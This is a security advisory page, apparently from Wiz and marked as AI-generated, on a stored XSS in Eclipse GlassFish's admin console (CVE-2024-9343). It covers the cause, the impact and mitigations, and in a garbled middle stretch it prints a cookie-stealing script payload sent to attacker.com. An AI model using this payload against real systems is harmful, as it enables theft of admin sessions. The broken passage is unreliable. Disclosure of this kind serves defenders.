
PEACH
Un cadre d’isolation des locataires
CVE-2024-9343 is a Stored Cross-Site Scripting (XSS) vulnerability in the Administration Console of Eclipse GlassFish version 7.0.15. It allows an attacker with high privileges to inject malicious scripts that are persistently stored and executed when other administrators access the console. The affected Maven package is org.glassfish.main.admingui:console-common, with versions up to and including 7.0.25 listed as affected with no patched version currently identified. It was published on July 16, 2025, with a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 6.1 (Medium) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). An authenticated attacker with administrative privileges can inject malicious JavaScript into fields within the GlassFish Administration Console; the payload is stored server-side and executed in the browsers of other administrators who subsequently visit the affected console pages. The attack vector is network-based, requires high privileges to inject the payload, and requires passive user interaction (another admin visiting the page) to trigger execution. The Eclipse security issue tracker references are available at https://gitlab.eclipse.org/security/cve-assignement/-/issues/37 and https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/230 (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other administrators accessing the GlassFish Administration Console, potentially leading to theft of administrative session credentials, unauthorized manipulation of console settings, and unauthorized actions within the GlassFish administration interface. The CVSS v4.0 scoring reflects a high subsequent system confidentiality impact, indicating that downstream systems accessible via the admin console could be exposed. Availability is not directly impacted, but the integrity and confidentiality of the administration environment are at risk (GitHub Advisory, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> into a vulnerable input field and save the configuration.<script>, onerror, javascript:) in configuration fields; repeated access to specific console pages by multiple admin accounts in short succession.The GitHub Advisory identifies versions up to and including 7.0.25 as affected with no patched version currently listed; users should monitor the Eclipse GlassFish release page for a fix and upgrade as soon as one is available (GitHub Advisory). In the interim, restrict access to the GlassFish Administration Console (port 4848) to trusted IP addresses only, implement strong multi-factor authentication for administrative accounts, and deploy a Web Application Firewall (WAF) with XSS detection rules. Additionally, review and audit all stored configuration values in the Administration Console for unexpected script content, and monitor administrative console logs for suspicious activity (Red Hat CVE).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."